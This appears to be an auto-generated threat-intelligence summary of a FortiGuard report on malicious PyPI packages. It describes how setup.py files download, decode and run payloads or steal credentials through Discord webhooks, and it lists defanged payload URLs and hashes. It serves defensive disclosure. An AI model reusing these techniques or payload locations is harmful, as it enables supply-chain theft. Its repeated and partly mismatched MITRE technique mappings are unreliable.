FortiGuard Labs identified 30+ zero-day attacks in PyPI packages during a short window in late March to late April, revealing several families and methods used to weaponize the open-source Python ecosystem. The campaigns rely on malicious setup.py behavior that downloads, decodes, or exfiltrates data via URLs and webhooks across multiple package sets.
Hashtags: #tls-bypass #zproxy #stripe-client #stripepy #proxycpz #pycolorstrex #pyproxyx #colored-fidget #async-box #seleniumunclickable #pyobfexecute #compilecls #randgenlib #aietelegram #social-scrapper #quick-telegram-sender #social-scrappers #tiktok-phone-cheker #roblopython #pycalculate #BlackCap-Grabber-NoDualHook #DiscordWebhook #GitHub #BlackCap #PythonPackageIndex
Hashtags: #tls-bypass #zproxy #stripe-client #stripepy #proxycpz #pycolorstrex #pyproxyx #colored-fidget #async-box #seleniumunclickable #pyobfexecute #compilecls #randgenlib #aietelegram #social-scrapper #quick-telegram-sender #social-scrappers #tiktok-phone-cheker #roblopython #pycalculate #BlackCap-Grabber-NoDualHook #DiscordWebhook #GitHub #BlackCap #PythonPackageIndex
Keypoints
- Fortinet reports 30+ zero-day attacks in PyPI packages discovered between late March and late April through monitoring of the open-source ecosystem.
- Set 1 (tls-bypass, zproxy, stripe-client, stripepy, proxycpz, pycolorstrex, pyproxyx, colored-fidget) uses setup.py to execute a Python script that connects to a potentially malicious URL.
- Set 2 (ailzyn1tr0, oauth20-api, bogdi) aims to steal information (credit cards, wallets, logins) via a Discord webhook.
- Set 3 (async-box) downloads a zip, extracts it, runs a script inside, and removes the directory.
- Set 4 (seleniumunclickable) connects to a URL to download and run a potentially malicious script.
- Set 5 (pyobfexecute) uses encoded data that, when decoded, writes and executes a potentially malicious Python script and then cleans up.
- Set 6 (compilecls, randgenlib, pipcoloringlibary, pipcoloringliberyV2, pythoncolourlibraryV1) includes a BlackCap webhook reference and bypasses VM/sandbox with code in __init__.py.
- Set 7 (aietelegram, social-scapper, quick-telegram-sender, libidreq, setnetwork, tg-bulk-sender, social-scrappers, tiktok-phone-cheker, cloud-client, cloudfix) decodes data to create and run an executable that exfiltrates data.
- Set 8 (roblopython) decodes to retrieve a likely executable from a URL and write/run it.
- Set 9 (pycalculate) shows multi-layer obfuscation and drops a WindowsDefender.py script as a hint of planned execution from a file-sharing source.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The setup.py files download and execute payloads or scripts from remote URLs. “the setup.py file in these packages tries to download a zip file to a directory (depending on the Python version), extract its contents, run a script contained in the zip file, and then remove its directory.”
- [T1048.003] Exfiltration to Web Service – Some packages attempt to exfiltrate data (e.g., credentials) via a Discord webhook. “The setup.py file in these packages tries to steal information, such as credit cards, wallets, account logins, etc. using a Discord webhook.”
- [T1059.006] Python – Execution involving Python scripts within the package workflow (e.g., encoded/decoded content executed by Python). “the encoded data shown below” and “the decoded data … runs.”
- [T1027] Obfuscated/Compressed Files and Information – Obfuscated or encoded payloads/scripts are decoded and executed. “Its setup.py file tries to execute the encoded data shown in Figure 5.”
- [T1055] Process Injection – References to bypassing VM/sandbox, hiding, and injection techniques observed in several sets. “bypassing VM machines, hiding itself, and injection techniques, etc.”
- [T1048.003] Exfiltration to Web Service – Repeated webhook-based data exfiltration patterns observed in multiple sets. “includes a GitHub link to … BlackCap-Grabber-NoDualHook” (context indicates exfiltration tooling and persistence across the chain).
- [T1059.006] Python (again) – In several sets, Python-based code within the package handles execution/decoding steps that enable payload delivery.
- [T1059.006] Python – The explicit mention of code execution in Python scripts within package initialization. “the malicious code is found in __init__.py”
- [T1041] Exfiltration – Data access and exfiltration behaviors observed across several sets (e.g., sensitive data like wallets, cookies).
Indicators of Compromise
- [File Hash] context – ffb2b2e714229f281add91aca0d57dcf, d4c635f97b6564b904803fc2aabbaed8 and 2 more hashes
- [File Hash] context – 89db7b4665cff163931777f091f3b8f5, 3330f0addf70da913f2612a1f4160966 and other hashes
- [URL] Malicious URLs – hxxps://paste.website/p/400c3e4b-a59b-4598-a199-75e848aeaae3.txt, hxxps://raw.githubusercontent.com/KSCHdsc/BlackCap-Inject/main/index.js
- [File Name] context – tls-bypass-1.0 setup.py, zproxy-1.0 setup.py